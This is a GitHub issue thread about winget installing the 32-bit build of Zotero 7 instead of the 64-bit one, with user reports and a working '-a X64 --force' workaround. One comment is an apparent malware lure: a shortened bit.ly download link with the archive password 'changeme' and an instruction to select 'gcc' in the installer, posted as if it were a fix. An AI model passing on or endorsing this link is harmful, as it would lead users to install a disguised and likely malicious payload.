### ISSUE TITLE
[Package Issue]: Zotero added 64-bit version in v7 but not handled by winget

### ISSUE THREAD

**Issue by xarthurx** [microsoft/winget-pkgs#169607]
### Please confirm these before moving forward

- [X] I have searched for my issue and not found a work-in-progress/duplicate/resolved issue.
- [X] I have not been informed if the issue is resolved in a preview version of the winget client.

### Category of the issue

Installer hash mismatch.

### Brief description of your issue

From Zotero v7, there're two versions, 32-bit and 64-bit.

The current manifest for `Zotero` is from v6 and automatically installed the 32-bit.
Even I manually install 64-bit version, updating the updating the software with `winget` will revert back to 32-bit (though newer version).

This problem should be resolved properly.

### Steps to reproduce

1. Install 64-bit version Zotero v7
2. Update Zotero with `winget`

### Actual behavior

`winget` install the 32-bit version.

### Expected behavior

The 64-bit version should be installed.

### Environment

```raw
Windows Package Manager v1.8.1911
Copyright (c) Microsoft Corporation. All rights reserved.

Windows: Windows.Desktop v10.0.19045.4780
System Architecture: X64
Package: Microsoft.DesktopAppInstaller v1.23.1911.0
```

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by David-Moody** [comment]
Just had this same issue with a fresh install. Winget defaults to 32-bit installer for 7.0.2. Winget will behave correctly if given:
`winget install Zotero -a X64 --force`
Force was required, as without it, it reuses the 32 bit installer previously downloaded.

**Comment by treysis** [comment]
How does winget determine which version to use?

**Comment by mfaathirarsa** [comment]
It seems that this problem is still present in version **7.0.11**

```
The following packages have an upgrade available, but require explicit targeting for upgrade:
Name   Id                    Version Available Source
-----------------------------------------------------
Zotero DigitalScholar.Zotero 7.0.9   7.0.11    winget

C:\Users\Admin>winget update DigitalScholar.Zotero
Found Zotero [DigitalScholar.Zotero] Version 7.0.11
This application is licensed to you by its owner.
Microsoft is not responsible for, nor does it grant any licenses to, third-party packages.
Downloading https://download.zotero.org/client/release/7.0.11/Zotero-7.0.11_win32_setup.exe
  ██████████████████████████████  83.5 MB / 83.5 MB
Successfully verified installer hash
Starting package install...
Successfully installed

C:\Users\Admin>
```
